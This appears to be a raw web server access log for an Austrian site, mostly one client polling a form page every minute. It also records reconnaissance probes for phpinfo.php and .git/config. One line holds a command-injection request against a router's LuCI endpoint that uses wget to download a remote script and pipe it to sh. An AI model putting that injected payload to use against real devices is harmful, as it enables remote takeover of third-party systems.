178.165.176.49 - - [13/Jan/2025:10:39:12 +0100] "GET /gui/javascript/form_form.js?1736761152 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:40:12 +0100] "GET /entry.php?id=10271&&ser=761152 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761091" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:40:12 +0100] "GET /gui/javascript/form_form.js?1736761212 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:41:12 +0100] "GET /entry.php?id=10271&&ser=761212 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761152" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:41:12 +0100] "GET /gui/javascript/form_form.js?1736761272 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:42:12 +0100] "GET /entry.php?id=10271&&ser=761272 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761212" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:42:13 +0100] "GET /gui/javascript/form_form.js?1736761332 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:43:13 +0100] "GET /entry.php?id=10271&&ser=761332 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=761272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:43:13 +0100] "GET /gui/javascript/form_form.js?1736761393 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
216.218.206.68 - - [13/Jan/2025:10:43:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
178.165.176.49 - - [13/Jan/2025:10:44:13 +0100] "GET /entry.php?id=10271&&ser=761393 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761332" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:44:13 +0100] "GET /gui/javascript/form_form.js?1736761453 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:45:13 +0100] "GET /entry.php?id=10271&&ser=761453 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761393" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:45:13 +0100] "GET /gui/javascript/form_form.js?1736761513 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:46:14 +0100] "GET /entry.php?id=10271&&ser=761513 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761453" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:46:14 +0100] "GET /gui/javascript/form_form.js?1736761574 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
216.218.206.68 - - [13/Jan/2025:10:47:02 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
178.165.176.49 - - [13/Jan/2025:10:47:14 +0100] "GET /entry.php?id=10271&&ser=761574 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761513" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:47:14 +0100] "GET /gui/javascript/form_form.js?1736761634 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
216.218.206.68 - - [13/Jan/2025:10:47:45 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
178.165.176.49 - - [13/Jan/2025:10:48:15 +0100] "GET /entry.php?id=10271&&ser=761634 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761574" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:48:15 +0100] "GET /gui/javascript/form_form.js?1736761695 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
216.218.206.68 - - [13/Jan/2025:10:48:23 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
216.218.206.68 - - [13/Jan/2025:10:48:25 +0100] "GET /phpinfo.php HTTP/1.1" 200 10224 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
216.218.206.68 - - [13/Jan/2025:10:48:27 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
178.165.176.49 - - [13/Jan/2025:10:49:15 +0100] "GET /entry.php?id=10271&&ser=761695 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=761634" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:49:15 +0100] "GET /gui/javascript/form_form.js?1736761755 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761695" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:50:16 +0100] "GET /entry.php?id=10271&&ser=761755 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761695" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:50:16 +0100] "GET /gui/javascript/form_form.js?1736761816 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761755" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:51:18 +0100] "GET /entry.php?id=10271&&ser=761816 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761755" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:51:18 +0100] "GET /gui/javascript/form_form.js?1736761878 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761816" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:52:18 +0100] "GET /entry.php?id=10271&&ser=761878 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761816" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:52:18 +0100] "GET /gui/javascript/form_form.js?1736761938 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761878" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:53:18 +0100] "GET /entry.php?id=10271&&ser=761938 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761878" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:53:19 +0100] "GET /gui/javascript/form_form.js?1736761999 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761938" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.215.236.132 - - [13/Jan/2025:10:53:53 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; U; Android 4.2; en-us; sdk Build/MR1) AppleWebKit/535.19 (KHTML, like Gecko) Version/4.2 Safari/535.19"
178.165.176.49 - - [13/Jan/2025:10:54:19 +0100] "GET /entry.php?id=10271&&ser=761999 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761938" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:54:19 +0100] "GET /gui/javascript/form_form.js?1736762059 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=761999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.136 - - [13/Jan/2025:10:55:11 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009231603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.49 - - [13/Jan/2025:10:55:19 +0100] "GET /entry.php?id=10271&&ser=762059 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=761999" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:55:19 +0100] "GET /gui/javascript/form_form.js?1736762119 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762059" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:56:19 +0100] "GET /entry.php?id=10271&&ser=762119 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762059" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:56:20 +0100] "GET /gui/javascript/form_form.js?1736762179 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762119" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
31.220.1.144 - - [13/Jan/2025:10:56:53 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.163.215.73%2Fmoo+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
178.165.176.49 - - [13/Jan/2025:10:57:20 +0100] "GET /entry.php?id=10271&&ser=762179 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762119" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:57:20 +0100] "GET /gui/javascript/form_form.js?1736762240 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
193.34.212.75 - - [13/Jan/2025:10:57:53 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.176.49 - - [13/Jan/2025:10:58:20 +0100] "GET /entry.php?id=10271&&ser=762240 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762179" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:58:20 +0100] "GET /gui/javascript/form_form.js?1736762300 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
156.59.198.135 - - [13/Jan/2025:10:59:12 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image054.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
71.6.232.24 - - [13/Jan/2025:10:59:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
178.165.176.49 - - [13/Jan/2025:10:59:20 +0100] "GET /entry.php?id=10271&&ser=762300 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762240" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:10:59:21 +0100] "GET /gui/javascript/form_form.js?1736762360 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762300" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:00:21 +0100] "GET /entry.php?id=10271&&ser=762360 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762300" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:00:21 +0100] "GET /gui/javascript/form_form.js?1736762421 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:01:21 +0100] "GET /entry.php?id=10271&&ser=762421 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762360" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:01:21 +0100] "GET /gui/javascript/form_form.js?1736762481 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762421" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:02:21 +0100] "GET /entry.php?id=10271&&ser=762481 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762421" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:02:21 +0100] "GET /gui/javascript/form_form.js?1736762541 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:03:21 +0100] "GET /entry.php?id=10271&&ser=762541 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762481" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:03:22 +0100] "GET /gui/javascript/form_form.js?1736762602 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:04:22 +0100] "GET /entry.php?id=10271&&ser=762602 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762541" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:04:22 +0100] "GET /gui/javascript/form_form.js?1736762662 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:05:22 +0100] "GET /entry.php?id=10271&&ser=762662 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762602" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:05:22 +0100] "GET /gui/javascript/form_form.js?1736762722 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:06:22 +0100] "GET /entry.php?id=10271&&ser=762722 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762662" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:06:22 +0100] "GET /gui/javascript/form_form.js?1736762782 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762722" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:07:22 +0100] "GET /entry.php?id=10271&&ser=762782 HTTP/1.1" 200 989 "http://hausegger.activities.at/entry.php?id=10271&&ser=762722" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:07:23 +0100] "GET /gui/javascript/form_form.js?1736762843 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762782" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:08:23 +0100] "GET /entry.php?id=10271&&ser=762842 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762782" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:08:23 +0100] "GET /gui/javascript/form_form.js?1736762903 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762842" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:09:23 +0100] "GET /entry.php?id=10271&&ser=762903 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762842" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:09:23 +0100] "GET /gui/javascript/form_form.js?1736762963 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762903" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:10:23 +0100] "GET /entry.php?id=10271&&ser=762963 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762903" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:10:23 +0100] "GET /gui/javascript/form_form.js?1736763023 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=762963" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:11:24 +0100] "GET /entry.php?id=10271&&ser=763023 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=762963" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:11:24 +0100] "GET /gui/javascript/form_form.js?1736763084 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:12:24 +0100] "GET /entry.php?id=10271&&ser=763084 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763023" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:12:24 +0100] "GET /gui/javascript/form_form.js?1736763144 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763084" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:13:24 +0100] "GET /entry.php?id=10271&&ser=763144 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763084" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:13:24 +0100] "GET /gui/javascript/form_form.js?1736763204 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763144" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:14:25 +0100] "GET /entry.php?id=10271&&ser=763204 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763144" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:14:25 +0100] "GET /gui/javascript/form_form.js?1736763265 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763204" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:15:25 +0100] "GET /entry.php?id=10271&&ser=763265 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763204" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:15:25 +0100] "GET /gui/javascript/form_form.js?1736763325 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763265" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:16:25 +0100] "GET /entry.php?id=10271&&ser=763325 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=763265" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:16:25 +0100] "GET /gui/javascript/form_form.js?1736763385 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763325" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:17:25 +0100] "GET /entry.php?id=10271&&ser=763385 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763325" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:17:26 +0100] "GET /gui/javascript/form_form.js?1736763445 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763385" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:18:26 +0100] "GET /entry.php?id=10271&&ser=763445 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763385" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:18:26 +0100] "GET /gui/javascript/form_form.js?1736763506 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763445" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:19:26 +0100] "GET /entry.php?id=10271&&ser=763506 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=763445" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:19:26 +0100] "GET /gui/javascript/form_form.js?1736763566 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763506" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:20:26 +0100] "GET /entry.php?id=10271&&ser=763566 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763506" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:20:26 +0100] "GET /gui/javascript/form_form.js?1736763626 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763566" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:21:26 +0100] "GET /entry.php?id=10271&&ser=763626 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=763566" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:21:27 +0100] "GET /gui/javascript/form_form.js?1736763687 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=763626" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
178.165.176.49 - - [13/Jan/2025:11:22:27 +0100] "GET /entry.php?id=10271&&ser=763687 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=763626" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
